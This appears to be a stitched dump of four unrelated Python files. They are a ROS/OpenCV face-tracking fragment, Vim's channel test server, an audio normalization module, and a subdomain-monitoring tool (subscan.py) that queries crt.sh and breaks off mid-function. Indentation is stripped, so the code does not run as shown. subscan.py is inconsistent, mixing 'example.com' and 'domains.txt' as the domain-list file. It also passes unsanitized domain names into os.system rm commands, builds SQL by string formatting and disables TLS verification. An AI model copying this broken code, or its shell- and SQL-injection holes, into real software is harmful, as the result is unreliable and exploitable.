cf: https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
'''
# newFlag: a flag to be set to True when a new frame is saved to captured_frame.
global captured_frame, newFlag
newFlag = False
print("starting video stream...")
print("press \"q\" in camera feed window to quit program")
cap = cv2.VideoCapture(0)
cap.set(3, c_width)
cap.set(4, c_height)
print("resolution is {} x {}".format(cap.get(3), cap.get(4)))
print("setresolution is {} x {}".format(c_width, c_height))
while not rospy.is_shutdown():
ret, captured_frame = cap.read()
newFlag = True
cap.release()
firstFlag = True
if __name__ == "__main__":
rospy.init_node("vision", anonymous=True)
rospack = rospkg.RosPack()
try:
camera_name = rospy.get_param("/camera_info/name")
width = rospy.get_param("/camera_info/width")
height = rospy.get_param("/camera_info/height")
distance = rospy.get_param("/camera_info/distance")
except KeyError:
print("ROS param for vision.py not found, so using default values....")
camera_name = "BSW20KM11BK"
width = 1280
height = 720
distance = 10
print("camera name:{}\theight:{}\twidth:{}".format(camera_name, height, width))
with open("{}/calibration_param/{}.json".format(rospack.get_path("akagachi_demo"), camera_name, ".json")) as fp:
params = json.load(fp)
proj = np.array(params['camera_matrix'])
print("camera projection matrix\n{}".format(proj))
inv_proj = np.linalg.inv(proj)
print("Inverse of camera projection matrix\n{}".format(inv_proj))
cameraThread = Thread(target=cameraLoop, args=(width, height))
cameraThread.daemon = True
cameraThread.start()
tfBroadcaster = tf.TransformBroadcaster()
dlib_detector = DlibFaceDetector(compress=0.2)
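    # Main loop: wait for a fresh frame from the camera thread, find the point between
    # the eyes, project it into 3D with the inverse camera matrix and broadcast it as
    # the /focus frame relative to /camera.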
while not rospy.is_shutdown():
while not newFlag:
# wait until a new frame is available.
# the main thread's process should probably always be slower than the camera thread, so in theory this should be bypassed every time.
if rospy.is_shutdown():
break
rospy.sleep(0.05)
frame = captured_frame.copy()
newFlag = False
overlayedImage, center = dlib_detector.dlib_detect(frame)
if center is not None or firstFlag:
if firstFlag:
center = np.array([width/2, height/2])
point3D = imgPoint_to_space_point(center, inv_proj, distance)
tfBroadcaster.sendTransform(point3D, tf.transformations.quaternion_from_euler(0, 0, 0), rospy.Time.now(), "/focus", "/camera")
        overlayedImage = cv2.flip(overlayedImage, 0)  # cv2.flip returns a new image; assign it so the flip takes effect
cv2.imshow('detection_results', overlayedImage)
input = cv2.waitKey(1) & 0xFF
if input == ord('q'):
break
firstFlag = False
cv2.destroyAllWindows()
|
test_channel.py
|
#!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class TestingRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("=== socket opened ===")
while True:
try:
received = self.request.recv(4096).decode('utf-8')
except socket.error:
print("=== socket error ===")
break
except IOError:
print("=== socket closed ===")
break
if received == '':
print("=== socket closed ===")
break
print("received: {0}".format(received))
# We may receive two messages at once. Take the part up to the
# newline, which should be after the matching "]".
todo = received
while todo != '':
splitidx = todo.find('\n')
if splitidx < 0:
used = todo
todo = ''
else:
used = todo[:splitidx]
todo = todo[splitidx + 1:]
if used != received:
print("using: {0}".format(used))
try:
decoded = json.loads(used)
except ValueError:
print("json decoding failed")
decoded = [-1, '']
# Send a response if the sequence number is positive.
if decoded[0] >= 0:
if decoded[1] == 'hello!':
# simply send back a string
response = "got it"
elif decoded[1] == 'malformed1':
cmd = '["ex",":"]wrong!["ex","smi"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise it
# sometimes fails on OS X.
time.sleep(0.2)
elif decoded[1] == 'malformed2':
cmd = '"unterminated string'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the double
# quote in the "ok" response terminates the string.
time.sleep(0.2)
elif decoded[1] == 'malformed3':
cmd = '["ex","missing ]"'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the ]
# in the "ok" response terminates the list.
time.sleep(0.2)
elif decoded[1] == 'split':
cmd = '["ex","let '
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
time.sleep(0.01)
cmd = 'g:split = 123"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1].startswith("echo "):
# send back the argument
response = decoded[1][5:]
elif decoded[1] == 'make change':
# Send two ex commands at the same time, before
# replying to the request.
cmd = '["ex","call append(\\"$\\",\\"added1\\")"]'
cmd += '["ex","call append(\\"$\\",\\"added2\\")"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'echoerr':
cmd = '["ex","echoerr \\\"this is an error\\\""]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Wait a bit, so that the "ex" command is handled
# before the "ch_evalexpr() returns. Otherwise we are
# outside the try/catch when the "ex" command is
# handled.
time.sleep(0.02)
elif decoded[1] == 'bad command':
cmd = '["ex","foo bar"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'do normal':
# Send a normal command.
cmd = '["normal","G$s more\u001b"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-works':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\\" . 123", -1]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-special':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\x7f\x10\x01bar\\"", -2]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-getline':
# Send an eval request. We ignore the response.
cmd = '["expr","getline(3)", -3]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-fails':
# Send an eval request that will fail.
cmd = '["expr","xxx", -4]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-error':
# Send an eval request that works but the result can't
# be encoded.
cmd = '["expr","function(\\"tr\\")", -5]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-bad':
# Send an eval request missing the third argument.
cmd = '["expr","xxx"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'an expr':
# Send an expr request.
cmd = '["expr","setline(\\"$\\", [\\"one\\",\\"two\\",\\"three\\"])"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call-func':
cmd = '["call","MyFunction",[1,2,3], 0]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw':
cmd = '["redraw",""]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw!':
cmd = '["redraw","force"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'empty-request':
cmd = '[]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-result':
# Send back the last received eval result.
response = last_eval
elif decoded[1] == 'call me':
cmd = '[0,"we called you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call me again':
cmd = '[0,"we did call you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = ""
elif decoded[1] == 'send zero':
cmd = '[0,"zero index"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "sent zero"
elif decoded[1] == 'close me':
print("closing")
self.request.close()
response = ""
elif decoded[1] == 'wait a bit':
time.sleep(0.2)
response = "waited"
elif decoded[1] == '!quit!':
# we're done
self.server.shutdown()
return
elif decoded[1] == '!crash!':
# Crash!
42 / 0
else:
response = "what?"
if response == "":
print("no response")
else:
encoded = json.dumps([decoded[0], response])
print("sending: {0}".format(encoded))
self.request.sendall(encoded.encode('utf-8'))
# Negative numbers are used for "eval" responses.
elif decoded[0] < 0:
last_eval = decoded
class ThreadedTCPRequestHandler(TestingRequestHandler):
def setup(self):
self.request.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def writePortInFile(port):
# Write the port number in Xportnr, so that the test knows it.
f = open("Xportnr", "w")
f.write("{0}".format(port))
f.close()
def main(host, port, server_class=ThreadedTCPServer):
# Wait half a second before opening the port to test waittime in ch_open().
    # We do want to report the port number, so get that first.  We cannot open the
    # socket yet, so we simply assume this port is free.
if len(sys.argv) >= 2 and sys.argv[1] == 'delay':
port = 13684
writePortInFile(port)
print("Wait for it...")
time.sleep(0.5)
server = server_class((host, port), ThreadedTCPRequestHandler)
ip, port = server.server_address[0:2]
# Start a thread with the server. That thread will then start a new thread
# for each connection.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
writePortInFile(port)
print("Listening on port {0}".format(port))
# Main thread terminates, but the server continues running
# until server.shutdown() is called.
try:
while server_thread.is_alive():
server_thread.join(1)
except (KeyboardInterrupt, SystemExit):
server.shutdown()
if __name__ == "__main__":
main("localhost", 0)
|
normalization.py
|
# Copyright 2020-2021 Jonas Schulte-Coerne and the CYSTINET-Africa project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import itertools
import math
import os
import struct
import threading
import time
import wave
import numpy
__all__ = ("normalize",)
def normalize(source, target, channel, highpass_frequency, target_level, headroom, resolution, level_smoothing, level_threshold, limiter_lookahead, show_progress):
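    # Streaming pipeline: read -> optional high-pass -> A-weighting (side chain) ->
    # activity envelope -> gated level estimate -> gain normalization -> look-ahead
    # limiter -> optional progress display -> write.  Every stage is a generator, so
    # the file is processed in a single pass without loading it into memory.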
stream, sampling_rate, length = read(path=source, channel=channel)
if highpass_frequency:
stream = highpass(stream, sampling_rate, frequency=highpass_frequency, order=2, regularization=0.0001)
stream = a_weighting(stream, sampling_rate)
stream = activity(stream, sampling_rate, smoothing_time=0.03)
stream = level(stream, sampling_rate, smoothing_time=level_smoothing, threshold=level_threshold)
stream = normalization(stream, level=target_level)
stream = limiter(stream, sampling_rate, clip=headroom, lookahead=limiter_lookahead, hold=limiter_lookahead / 2)
if show_progress:
stream = status(stream, length=length)
write(stream, sampling_rate, path=target, bits=resolution)
###################################
# The signal processing functions #
###################################
def read(path, channel):
chunk_size = 2**14
try:
import soundfile
except ImportError:
def stream():
with wave.open(str(path), "rb") as f:
number_of_channels = f.getnchannels()
if channel > number_of_channels:
raise ValueError(f"The channel {channel} does not exist in the file with {number_of_channels} channels")
bits = f.getsampwidth()
code = {2: "h", 4: "i"}[bits]
factor = 1.0 / (2 ** (8 * f.getsampwidth() - 1))
chunk = f.readframes(chunk_size)
while chunk:
number_of_frames = len(chunk) // bits
mask = f"<{number_of_frames}{code}"
yield from numpy.multiply(struct.unpack(mask, chunk)[channel-1::number_of_channels], factor)
chunk = f.readframes(chunk_size)
with wave.open(str(path), "rb") as f:
sampling_rate = float(f.getframerate())
length = f.getnframes()
return stream(), sampling_rate, length
else:
def stream():
with soundfile.SoundFile(path) as f:
chunk = f.read(chunk_size, always_2d=True)
while len(chunk):
yield from chunk[:, channel-1]
chunk = f.read(chunk_size, always_2d=True)
with soundfile.SoundFile(path) as f:
sampling_rate = float(f.samplerate)
length = f.frames
return stream(), sampling_rate, length
def _apply_iir_filter(stream, zb, za, copy_input=False):
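    # Direct-form IIR filter on a streaming generator: data_window holds the last
    # len(zb) inputs and len(za)-1 outputs, and each output sample is the dot product
    # of that window with (zb, -za[:-1]).  With copy_input=True the raw input sample
    # is yielded alongside the filtered one, which the A-weighting side chain uses.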
coefficients = numpy.empty(len(zb) + len(za) - 1)
coefficients[0:len(zb)] = zb
coefficients[len(zb):] = -za[0:-1]
data_window = numpy.zeros(len(coefficients))
input_cache = data_window[0:len(zb)]
output_cache = data_window[len(zb):]
if copy_input:
for sample in stream:
input_cache[0:-1] = input_cache[1:]
input_cache[-1] = sample
filtered = numpy.dot(coefficients, data_window)
output_cache[0:-1] = output_cache[1:]
output_cache[-1] = filtered
yield sample, filtered
else:
for sample in stream:
input_cache[0:-1] = input_cache[1:]
input_cache[-1] = sample
filtered = numpy.dot(coefficients, data_window)
output_cache[0:-1] = output_cache[1:]
output_cache[-1] = filtered
yield filtered
def highpass(stream, sampling_rate, frequency, order, regularization):
# compute the filter coefficients for a time-continuous Butterworth filter
k = 1 / (2 * math.pi * frequency)
if order == 1:
a = (k, 1)
elif order == 2:
a = (k**2, 2 * k * math.cos(math.pi / 4), 1)
else:
raise ValueError("Filter orders higher than two are not supported.")
order = len(a) - 1
b = (1,) + (0,) * order
# transform the coefficients with the bilinear transform
fs = sampling_rate
q = 1.0 - regularization
formulas = {
1: lambda x: (-2 * x[0] * fs + x[1] * q, 2 * x[0] * fs + x[1]),
2: lambda x: (4 * x[0] * fs**2 - 2 * x[1] * fs * q + x[2] * q**2, -8 * x[0] * fs**2 + 2 * x[1] * fs * (q - 1) + 2 * x[2] * q, 4 * x[0] * fs**2 + 2 * x[1] * fs + x[2]),
}
za, zb = (formulas[order](x) for x in (a, b))
zb = numpy.divide(zb, za[-1])
zb *= k ** order
za = numpy.divide(za, za[-1])
# apply the filter to the stream
yield from _apply_iir_filter(stream, zb, za)
def a_weighting(stream, sampling_rate):
# compute the zeros and poles for a time-continuous A-weighting filter
fr = 1000.0 # 1000Hz in IEC 61672-1
fl = 10 ** 1.5 # f_L in IEC 61672-1:2013, Appendix E.2
fa = 10 ** 2.45 # f_A in IEC 61672-1:2013, Appendix E.3
fh = 10 ** 3.9 # f_H in IEC 61672-1
fr2 = fr ** 2
fl2 = fl ** 2
fh2 = fh ** 2
c = fl2 * fh2 # c in IEC 61672-1
d = 0.5 ** 0.5 # D in IEC 61672-1
b = (fr2 + c / fr2 - d * (fl2 + fh2)) / (1.0 - d) # b in IEC 61672-1
root = (b ** 2 - 4 * c) ** 0.5
root5 = 5 ** 0.5 / 2
f1 = ((-b - root) / 2) ** 0.5 # f_1 in IEC 61672-1
f2 = (1.5 - root5) * fa # f_2 in IEC 61672-1
f3 = (1.5 + root5) * fa # f_3 in IEC 61672-1
f4 = ((-b + root) / 2) ** 0.5 # f_2 in IEC 61672-1
zeros = (0.0,) * 4
poles = numpy.multiply((f1, f1, f2, f3, f4, f4), -2 * math.pi)
# transform the zeros and poles with the matched-z-transform
num, den = (functools.reduce(numpy.polynomial.polynomial.polymul, ((-math.exp(x / sampling_rate), 1.0) for x in d)) for d in (zeros, poles))
gain = 10 ** (2.446165 / 20)
zb, za = numpy.divide(num, gain*den[-1]), numpy.divide(den, den[-1])
# apply the filter to the stream
yield from _apply_iir_filter(stream, zb, za, copy_input=True)
def activity(stream, sampling_rate, smoothing_time):
stream = iter(stream)
smoothing = numpy.exp(-2*math.pi / (smoothing_time * sampling_rate))
first = numpy.empty(shape=(int(round(sampling_rate * smoothing_time)), 2))
for i, sample in zip(range(len(first)), stream):
first[i] = sample
first = first[0:i+1]
envelope0 = envelope1 = numpy.linalg.norm(first[:, 1]) / math.sqrt(len(first))
for data in (first, stream):
for output, side_chain in data:
squared = side_chain ** 2
envelope0 = (envelope0 - squared) * smoothing + squared
envelope1 = (envelope1 - envelope0) * smoothing + envelope0
yield output, math.sqrt(envelope1)
first = None
def level(stream, sampling_rate, smoothing_time, threshold):
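    # Gated level estimation: the doubly smoothed envelope is only updated while the
    # side-chain value stays within `threshold` dB of the current estimate (threshold
    # is negative), so pauses and background noise do not drag the level down.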
stream = iter(stream)
smoothing = numpy.exp(-2*math.pi / (smoothing_time * sampling_rate))
first = numpy.empty(shape=(int(round(sampling_rate * smoothing_time)), 2))
for i, sample in zip(range(len(first)), stream):
first[i] = sample
first = first[0:i+1]
envelope0 = envelope1 = numpy.linalg.norm(first[:, 1]) / math.sqrt(len(first))
threshold_factor = 10.0 ** (threshold / 20.0)
for data in (first, stream):
for output, side_chain in data:
activity = 0
if side_chain >= envelope1 * threshold_factor:
envelope0 = (envelope0 - side_chain) * smoothing + side_chain
envelope1 = (envelope1 - envelope0) * smoothing + envelope0
activity = 0.5
yield output, envelope1
first = None
def normalization(stream, level):
target_level = 10.0 ** (level / 20.0)
for output, side_chain in stream:
yield output * target_level / side_chain
def limiter(stream, sampling_rate, clip, lookahead, hold):
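    # Look-ahead brick-wall limiter: the audio is delayed by `lookahead` seconds in
    # `buffer` while `gain_buffer` holds the gain for each delayed sample.  When a
    # peak above `clip` dB[FS] is detected, the gain ramps down across the look-ahead
    # window (attack), is held for `hold` seconds, then ramps back to unity (release).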
stream = iter(stream)
peak = 10.0 ** (clip / 20.0)
length = int(round(lookahead * sampling_rate))
buffer = numpy.zeros(length)
gain_buffer = numpy.ones(length)
ones = itertools.cycle((1.0, ))
hold = numpy.empty(int(round(hold * sampling_rate)))
release = None
for i, sample in zip(range(length), stream):
buffer[i] = sample
amplitude = max(numpy.abs(buffer))
if amplitude > peak:
target_gain = peak / amplitude
gain_buffer[:] = target_gain
release = numpy.linspace(target_gain, 1.0, length)
state = release
else:
state = ones
target_gain = 1.0
i = 0
while True:
for sample, gain in zip(stream, state):
current_gain = gain_buffer[i]
amplitude = abs(sample)
yield buffer[i] * current_gain
buffer[i] = sample
gain_buffer[i] = gain
i = (i + 1) % length
if amplitude * gain > peak:
target_gain = min(target_gain, peak / amplitude)
slope = (target_gain - current_gain) / length
slope = min(gain_buffer[i] - current_gain, slope)
if slope == 0:
gain_buffer[:] = target_gain
release = numpy.linspace(target_gain, 1.0, length)
state = release
else:
attack = numpy.arange(current_gain + slope, target_gain, slope)
gain_buffer[0:len(attack)] = attack
gain_buffer[len(attack):] = target_gain
gain_buffer = numpy.roll(gain_buffer, i)
hold[:] = target_gain
state = hold
break
else:
if state is hold:
release = numpy.linspace(target_gain, 1.0, length)
state = release
elif state is release:
target_gain = 1.0
state = ones
elif state is ones:
break
buffer = numpy.roll(buffer, -i)
gain_buffer = numpy.roll(gain_buffer, -i)
fade_out = numpy.blackman(2*length)[length:]
gain_buffer *= fade_out
for sample, gain in zip(buffer, gain_buffer):
yield sample * gain
def status(stream, length):
start = time.time()
i = 0
run = True
def poll_information():
while run:
print(f"processing the audio track: {i / length * 100:4.1f}% ({int(round(time.time() - start))}s)", end="\r")
time.sleep(2)
thread = threading.Thread(target=poll_information)
thread.daemon = True
thread.start()
for i, sample in enumerate(stream):
yield sample
run = False
thread.join()
duration = time.time() - start
print(f"processing the audio track: done in {int(duration / 60)}:{int(round(duration % 60))} minutes")
def write(stream, sampling_rate, path, bits):
    buffer_size = 2**14 * 8 // bits  # buffer 16kB of the output file before writing it to disk
buffer = numpy.empty(buffer_size)
factor = 2 ** (bits - 1) - 1
code = {16: "h", 32: "i"}[bits]
try:
import soundfile
except ImportError:
if not str(path).lower().endswith(".wav") or bits not in (16, 32):
raise ValueError("Writing files other than 16 or 32 bit wav files is not supported.\n"
"Change the file format or read the documentation about how to use the SoundFile library to support additional formats.")
with wave.open(str(path), "wb") as f:
f.setnchannels(1)
f.setsampwidth(bits // 8)
f.setframerate(int(round(sampling_rate)))
while True:
i = -1
for i, sample in zip(range(buffer_size), stream):
buffer[i] = sample
if i >= 0:
b = buffer[0:i+1]
b *= factor
mask = f"<{len(b)}{code}"
integers = numpy.round(b).astype(int)
chunk = struct.pack(mask, *integers)
f.writeframes(chunk)
else:
break
else:
file_format = {".wav": "WAV", ".flac": "FLAC"}[os.path.splitext(path)[1]]
with soundfile.SoundFile(path, mode="w",
samplerate=int(round(sampling_rate)), channels=1,
format=file_format, subtype=f"PCM_{bits}") as f:
while True:
i = -1
for i, sample in zip(range(buffer_size), stream):
buffer[i] = sample
if i >= 0:
f.write(buffer[0:i+1])
else:
break
##############################################
# If the file is used as a standalone script #
##############################################
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("source", help="the path to the audio file that shall be normalized", type=str)
parser.add_argument("target", help="the path to where the normlized audio shall be saved", type=str)
parser.add_argument("-c", "--channel", help="the channel of the input audio file", type=int, default=1)
parser.add_argument("-f", "--highpass", help="a frequency for a high pass filter", type=float, default=None)
parser.add_argument("-l", "--level", help="the target level in db[FS]", type=float, default=-20.0)
parser.add_argument("-p", "--headroom", help="the headroom in dB[FS] after limiting", type=float, default=-0.1)
parser.add_argument("-r", "--resolution", help="the resolution in bits of the target file", type=int, default=16)
parser.add_argument("-s", "--smoothing", help="the smoothing time in seconds for the level normalization", type=float, default=10.0)
parser.add_argument("-t", "--threshold", help="the level threshold in dB for the activity detection of the normalization", type=float, default=-10.0)
parser.add_argument("-a", "--lookahead", help="the lookahead time of the limiter in seconds", type=float, default=0.025)
args = parser.parse_args()
normalize(source=args.source,
target=args.target,
channel=args.channel,
highpass_frequency=args.highpass,
target_level=args.level,
headroom=args.headroom,
resolution=args.resolution,
level_smoothing=args.smoothing,
level_threshold=args.threshold,
limiter_lookahead=args.lookahead,
show_progress=True)
|
subscan.py
|
#!/usr/bin/env python
# coding: utf-8
import argparse
import dns.resolver
import sys
import requests
import json
import difflib
import os
import re
import psycopg2
from tld import get_fld
from tld.utils import update_tld_names
from termcolor import colored
import threading
is_py2 = sys.version[0] == "2" #checks if python version used == 2 in order to properly handle import of Queue module depending on the version used.
if is_py2:
import Queue as queue
else:
import queue as queue
from config import *
import time
#version = "1.0.0"
requests.packages.urllib3.disable_warnings()
def banner():
print(colored('''
##### # # ####### ###### ###### #####
# # ## # # # # # # # #
# # # # # # # # # #
##### # # # ##### ###### ###### #####
# # # # # # # # #
# # # ## # # # # #
##### # # ####### # # # #######
''', "yellow"))
print(colored(" SNE RP2 project", "green"))
print(colored(" Version: {}", "green").format(version))
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-u',
dest = "target",
help = "Domain to add. E.g: test.com",
required = False)
parser.add_argument('-d',
dest = "remove_domain",
help = "Domain to remove from the monitored list. E.g: yahoo.com",
required = False)
parser.add_argument('-t',
dest = "threads",
help = "Number of concurrent threads to use.",
type = int,
default = 20)
parser.add_argument('-r',
dest = "resolve",
help = "Perform DNS resolution.",
required=False,
nargs='?',
const="True")
parser.add_argument('-a',
dest = "listing",
help = "Listing all monitored domains.",
required = False,
nargs='?',
const="True")
parser.add_argument('-m',
dest = "reset",
help = "Reset everything.",
nargs='?',
const="True")
return parser.parse_args()
def domain_sanity_check(domain): #Verify the domain name sanity
if domain:
try:
domain = get_fld(domain, fix_protocol = True)
return domain
except:
print(colored("[!] Incorrect domain format.Ex: example.com, http(s)://example.com, www.example.com", "red"))
sys.exit(1)
else:
pass
def reset(do_reset): #clear the monitored list of domains and remove all locally stored files
if do_reset:
os.system("cd ./output/ && rm -f *.txt && cd .. && rm -f example.com && touch example.com ")
print(colored("\n[!] Reset was successfully. Please add new domains!", "blue"))
sys.exit(1)
else: pass
def remove_domain(domain_to_delete): #remove a domain from the monitored list
new_list = []
if domain_to_delete:
with open("example.com", "r") as domains:
for line in domains:
line = line.replace("\n", "")
                if line == domain_to_delete:
os.system("rm -f ./output/{}.txt".format(line))
print(colored("\n[-] {} was successfully removed from the list.".format(line), "green"))
else:
new_list.append(line)
os.system("rm -f example.com")
with open("example.com", "w") as new_file:
for i in new_list:
new_file.write(i + "\n")
sys.exit(1)
def domains_listing(): #list all the monitored domains
global list_domains
if list_domains:
print(colored("\n[*] Below is the list of saved domain names:\n", "green"))
with open("example.com", "r") as monitored_list:
for domain in monitored_list:
print(colored("{}".format(domain.replace("\n", "")), "yellow"))
sys.exit(1)
class cert_database(object): #Connecting to crt.sh public API to retrieve subdomains
global enable_logging
def lookup(self, domain, wildcard = True):
try:
try: #connecting to crt.sh postgres database to retrieve subdomains.
unique_domains = set()
domain = domain.replace('%25.', '')
conn = psycopg2.connect("dbname={0} user={1} host={2}".format(DB_NAME, DB_USER, DB_HOST))
conn.autocommit = True
cursor = conn.cursor()
cursor.execute("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%{}'));".format(domain))
for result in cursor.fetchall():
matches = re.findall(r"\'(.+?)\'", str(result))
for subdomain in matches:
try:
if get_fld("https://" + subdomain) == domain:
unique_domains.add(subdomain.lower())
except: pass
return sorted(unique_domains)
except:
error = "Unable to connect to the database. We will attempt to use the API instead."
errorlog(error, enable_logging)
except:
base_url = "https://crt.sh/?q={}&output=json"
if wildcard:
domain = "%25.{}".format(domain)
url = base_url.format(domain)
subdomains = set()
user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0'
            req = requests.get(url, headers={'User-Agent': user_agent}, timeout=20, verify=False) #times out after 20 seconds waiting
if req.status_code == 200:
try:
content = req.content.decode('utf-8')
data = json.loads(content)
for subdomain in data:
subdomains.add(subdomain["name_value"].lower())
return sorted(subdomains)
except:
error = "Error retrieving information for {}.".format(domain.replace('%25.', ''))
errorlog(error, enable_logging)
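# Minimal usage sketch (not part of the original source): lookup() returns a
# sorted list of subdomains for the monitored domain, or None if both the
# PostgreSQL and JSON API branches above fail. Values below are illustrative:
#
#   subs = cert_database().lookup("example.com")
#   # subs -> ["blog.example.com", "www.example.com", ...]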
def queuing(): #using the queue for multithreading purposes
global domain_to_monitor
global q1
global q2
q1 = queue.Queue(maxsize=0)
q2 = queue.Queue(maxsize=0)
if domain_to_monitor:
pass
elif os.path.getsize("domains.txt") == 0:
print(colored("[!] Please consider adding a list of domains to monitor first.", "red"))
sys.exit(1)
else:
with open("domains.txt", "r") as targets:
for line in targets:
if line != "":
q1.put(line.replace('\n', ''))
q2.put(line.replace('\n', ''))
else: pass
def adding_new_domain(q1): #adds a new domain to the monitoring list
unique_list = []
global domain_to_monitor
global input
if domain_to_monitor:
if not os.path.isfile('./domains.txt'): #check if domains.txt exist, if not create a new one
os.system("touch domains.txt")
else: pass
with open("domains.txt", "r+") as domains: #checking domain name isn't already monitored
for line in domains:
if domain_to_monitor == line.replace('\n', ''):
print(colored("[!] The domain name {} is already being monitored.".format(domain_to_monitor), "red"))
sys.exit(1)
response = cert_database().lookup(domain_to_monitor)
with open("./output/" + domain_to_monitor.lower() + ".txt", "a") as subdomains: #saving a copy of current subdomains
for subdomain in response:
subdomains.write(subdomain + "\n")
with open("domains.txt", "a") as domains: #fetching subdomains if not monitored
domains.write(domain_to_monitor.lower() + '\n')
print(colored("\n[+] Adding {} to the list of domains.\n".format(domain_to_monitor), "blue"))
try: input = raw_input #fixes python 2.x and 3.x input keyword
except NameError: pass
choice = input(colored("[?] Do you wish to list subdomains found for {}? [Y]es [N]o (default: [N]) ".format(domain_to_monitor), "blue")) #listing subdomains upon request
if choice.upper() == "Y":
if response:
for subdomain in response:
unique_list.append(subdomain)
unique_list = list(set(unique_list))
for subdomain in unique_list:
print(colored(subdomain, "yellow"))
else:
print(colored("\n[!] Unfortunately, we couldn't find any subdomain for {}".format(domain_to_monitor), "red"))
else:
sys.exit(1)
else: #checks if a domain is monitored but has no text file saved in ./output
try:
line = q1.get(timeout=10)
if not os.path.isfile("./output/" + line.lower() + ".txt"):
response = cert_database().lookup(line)
if response:
with open("./output/" + line.lower() + ".txt", "a") as subdomains:
for subdomain in response:
subdomains.write(subdomain + "\n")
else: pass
else: pass
except queue.Empty:
pass
def check_new_subdomains(q2): #retrieves the new list of subdomains and stores a temporary text file for comparison purposes
global domain_to_monitor
global domain_to_delete
if domain_to_monitor is None:
if domain_to_delete is None:
try:
line = q2.get(timeout=10)
print("[*] Checking {}".format(line))
with open("./output/" + line.lower() + "_tmp.txt", "a") as subs:
response = cert_database().lookup(line)
if response:
for subdomain in response:
subs.write(subdomain + "\n")
except queue.Empty:
pass
else: pass
def compare_files_diff(domain_to_monitor): #compares the temporary text file with previously stored copy to check if there are new subdomains
global enable_logging
if domain_to_monitor is None:
if domain_to_delete is None:
result = []
with open("domains.txt", "r") as targets:
for line in targets:
domain_to_monitor = line.replace('\n', '')
try:
file1 = open("./output/" + domain_to_monitor.lower() + '.txt', 'r')
file2 = open("./output/" + domain_to_monitor.lower() + '_tmp.txt', 'r')
diff = difflib.ndiff(file1.readlines(), file2.readlines())
changes = [l for l in diff if l.startswith('+ ')] #check if there are new items/subdomains
newdiff = []
for c in changes:
c = c.replace('+ ', '')
c = c.replace('*.', '')
c = c.replace('\n', '')
result.append(c)
result = list(set(result)) #remove duplicates
except:
error = "There was an error opening one of the files: {} or {}".format(domain_to_monitor + '.txt', domain_to_monitor + '_tmp.txt')
errorlog(error, enable_logging)
os.system("rm -f ./output/{}".format(line.replace('\n','') + "_tmp.txt"))
return(result)
def dns_resolution(new_subdomains): #Perform DNS resolution on retrieved subdomains
dns_results = {}
subdomains_to_resolve = new_subdomains
